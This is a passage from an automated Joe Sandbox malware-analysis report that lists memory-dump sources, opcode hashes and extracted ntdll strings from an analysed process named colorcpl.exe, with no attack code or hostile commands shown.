                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 2ab842d349ae8b8a43137ab9275d7c417e2b2b760d76e8b23284f4db3380a0f2
                          • Instruction ID: c055f587a261cca64786cce60e3dcd10e79e1cc27a1b3b9b3538ff6e1709690f
                          • Opcode Fuzzy Hash: 2ab842d349ae8b8a43137ab9275d7c417e2b2b760d76e8b23284f4db3380a0f2
                          • Instruction Fuzzy Hash: 6990023120180882F20071584404B4600158BE0305F55C016B01257A8D8615D9517521

                          Control-flow Graph
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: bbc464c21b4cd3648ea77b298b3ca4f0b80f08f719b598ab34adf3c18724a8ba
                          • Instruction ID: 7c1ff31da75bf5a1b50863846ff4422f2f829655e4c32a5572f9b884211ed1c8
                          • Opcode Fuzzy Hash: bbc464c21b4cd3648ea77b298b3ca4f0b80f08f719b598ab34adf3c18724a8ba
                          • Instruction Fuzzy Hash: 9190023120188842F2107158840474A00158BD0305F59C411B44257ACD8695D9917121

                          Control-flow Graph
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 0a032b3e4837fc6d833bd9b533a4f55eeccac268f222c76bfd161b7b7eff1977
                          • Instruction ID: bb2964115a2e787e35826c85e7a4a4764fa18c15c7a36337023d552f67ccb3ca
                          • Opcode Fuzzy Hash: 0a032b3e4837fc6d833bd9b533a4f55eeccac268f222c76bfd161b7b7eff1977
                          • Instruction Fuzzy Hash: AD900221242841927645B158440460740169BE0245795C012B1415BA4C8526E956E621

                          Control-flow Graph
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: a597123cd0e3da110d7f68d87f38e574099e444e4850e96774553ad89d860c19
                          • Instruction ID: db5f5c0730b142495de8a17d0598306b3e0507acb4d745df603ed244ba82a1d5
                          • Opcode Fuzzy Hash: a597123cd0e3da110d7f68d87f38e574099e444e4850e96774553ad89d860c19
                          • Instruction Fuzzy Hash: E790023120180453F2117158450470700198BD0245F95C412B04257ACD9656DA52B121

                          Control-flow Graph
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: c0719a6545358dc19fcfb88aef3bf364856a00b7f52d9bc0a3c0efa40b79e43e
                          • Instruction ID: aa4d9e013b21e2aac356a1c5c5c87c3aaea79c38020e22c2cdb972856753c4e9
                          • Opcode Fuzzy Hash: c0719a6545358dc19fcfb88aef3bf364856a00b7f52d9bc0a3c0efa40b79e43e
                          • Instruction Fuzzy Hash: B390022921380042F2807158540870A00158BD1206F95D415B00167ACCC915D9696321

                          Control-flow Graph
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4a1446032342bb00c97817a099bdd7755e1f43cd02a356d8051543260bc938a3
                          • Instruction ID: c6ce6e4486c401761b4b5f8c10bae7867d8f9177b2c4cc4ba6e9c7ea54838c07
                          • Opcode Fuzzy Hash: 4a1446032342bb00c97817a099bdd7755e1f43cd02a356d8051543260bc938a3
                          • Instruction Fuzzy Hash: A290022130180043F240715854187064015DBE1305F55D011F04157A8CD915D9566222
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: c87491db24ca0f4a740ec6f8742a370b4dab00d0eb1b7fa30e010554142da6f5
                          • Instruction ID: 5c3d4e0ccf294cc9490b61dfd6f13f896d5e62716fc44225c1f715c6825bf971
                          • Opcode Fuzzy Hash: c87491db24ca0f4a740ec6f8742a370b4dab00d0eb1b7fa30e010554142da6f5
                          • Instruction Fuzzy Hash: E9900261201C0443F2407558480470700158BD0306F55C011B20657A9E8A29DD517135
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6ad413ca845a1b8a70c6ed94e9adcc33d1ba0008c12589cd62eb5c82469f2663
                          • Instruction ID: 315cdb0d0ca6f367bb8106732028ba21d9ccdc8f5056a83dd5a34eb3025b2ded
                          • Opcode Fuzzy Hash: 6ad413ca845a1b8a70c6ed94e9adcc33d1ba0008c12589cd62eb5c82469f2663
                          • Instruction Fuzzy Hash: F290022160180542F20171584404716001A8BD0245F95C022B10257A9ECA25DA92B131
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4994d3940b1c89adfe7947a7e39f37d46ec311c579123323b5c534d4d11b4536
                          • Instruction ID: 0489fdaf3834d3d6380885c73666489789ead80b4d2cff6e2031831b90e471a3
                          • Opcode Fuzzy Hash: 4994d3940b1c89adfe7947a7e39f37d46ec311c579123323b5c534d4d11b4536
                          • Instruction Fuzzy Hash: 7E900221211C0082F30075684C14B0700158BD0307F55C115B01557A8CC915D9616521
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 0d46ac85e1f784bab94f1137f16a400f2bf06d219a7d8671ba3f4286c9ed48ef
                          • Instruction ID: 0b97e0a338d4e66dbad67650c50f08dfa75fa31044074960047ad28e98ebcfa8
                          • Opcode Fuzzy Hash: 0d46ac85e1f784bab94f1137f16a400f2bf06d219a7d8671ba3f4286c9ed48ef
                          • Instruction Fuzzy Hash: 9090022160180082624071688844A064015AFE1215755C121B09997A4D8559D9656665
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 923cf47ff4789abf966886f86de803ab5ff9519bac52b83d55b35aee2ee153ce
                          • Instruction ID: 002f93877fc08266e5d1cafaf259c32467cd442714c0aede44df1596273bfe90
                          • Opcode Fuzzy Hash: 923cf47ff4789abf966886f86de803ab5ff9519bac52b83d55b35aee2ee153ce
                          • Instruction Fuzzy Hash: 5D90026134180482F20071584414B060015CBE1305F55C015F10657A8D8619DD527126

                          Control-flow Graph
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6e0369f26a8f4cb7509d64353a6391326be871613e29a6e294d257e07b8c5b6f
                          • Instruction ID: e254a2984fba97ad2d011269b6a2056c159bfd3f9848230ac2ce54f3164e9de8
                          • Opcode Fuzzy Hash: 6e0369f26a8f4cb7509d64353a6391326be871613e29a6e294d257e07b8c5b6f
                          • Instruction Fuzzy Hash: BD900225211800432205B558070460700568BD5355355C021F10167A4CD621D9616121

                          Control-flow Graph
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 4e85d11dd58f81929950f0872694a16e620e37b2bf9d6ec120b0a89d0117b082
                          • Instruction ID: bca50973cebef71e61a5c6ab705b2ec30c33e6de13b5fe50fd98fad66becb679
                          • Opcode Fuzzy Hash: 4e85d11dd58f81929950f0872694a16e620e37b2bf9d6ec120b0a89d0117b082
                          • Instruction Fuzzy Hash: 65900225221800422245B558060460B04559BD6355395C015F14177E4CC621D9656321

                          Control-flow Graph
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 0ab1139cabdff37981711a05e8616be824202f646e931e6019ad1b76079a5d0c
                          • Instruction ID: 6936d486bfdd80e03389b55fecbb4a0561fe55d729cb10915e20db36f7eab3f1
                          • Opcode Fuzzy Hash: 0ab1139cabdff37981711a05e8616be824202f646e931e6019ad1b76079a5d0c
                          • Instruction Fuzzy Hash: 5190023120584882F24071584404B4600258BD0309F55C011B00657E8D9625DE55B661

                          Control-flow Graph
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0

                          Control-flow Graph (image not reproduced): block 142 at 4cf2ba0-4cf2bac calls LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0

                          Control-flow Graph (image not reproduced): block 141 at 4cf2b60-4cf2b6c calls LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0

                          Control-flow Graph (image not reproduced): block 135 at 4cf2c0a-4cf2c0f branches to block 136 at 4cf2c1f-4cf2c26 (calls LdrInitializeThunk) and to block 137 at 4cf2c11-4cf2c18; edges 135->136, 135->137
                          APIs
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2284585665.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2a80000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID: _)k!
                          • API String ID: 0-1339432885
                          Memory Dump Source
                          • Source File: 00000008.00000002.2284585665.0000000002A80000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A80000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_2a80000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288786271.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4b40000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                          • API String ID: 48624451-2108815105
                          Strings
                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04D24787
                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04D24655
                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04D24742
                          • ExecuteOptions, xrefs: 04D246A0
                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04D24725
                          • Execute=1, xrefs: 04D24713
                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04D246FC
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                          • API String ID: 0-484625025
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: __aulldvrm
                          • String ID: +$-$0$0
                          • API String ID: 1302938615-699404926
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: ___swprintf_l
                          • String ID: %%%u$[$]:%u
                          • API String ID: 48624451-2819853543
                          Strings
                          • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04D202E7
                          • RTL: Re-Waiting, xrefs: 04D2031E
                          • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04D202BD
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                          • API String ID: 0-2474120054
                          Strings
                          • RTL: Resource at %p, xrefs: 04D27B8E
                          • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04D27B7F
                          • RTL: Re-Waiting, xrefs: 04D27BAC
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID:
                          • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 0-871070163
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04D2728C
                          Strings
                          • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04D27294
                          • RTL: Resource at %p, xrefs: 04D272A3
                          • RTL: Re-Waiting, xrefs: 04D272C1
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_8_2_4c80000_colorcpl.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                          • API String ID: 885266447-605551621
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000008.00000002.2288885160.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true
                          • Associated: 00000008.00000002.2288885160.0000000004DA9000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004DAD000.00000040.00001000.00020000.00000000.sdmp
                          • Associated: 00000008.00000002.2288885160.0000000004E1E000.00000040.00001000.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
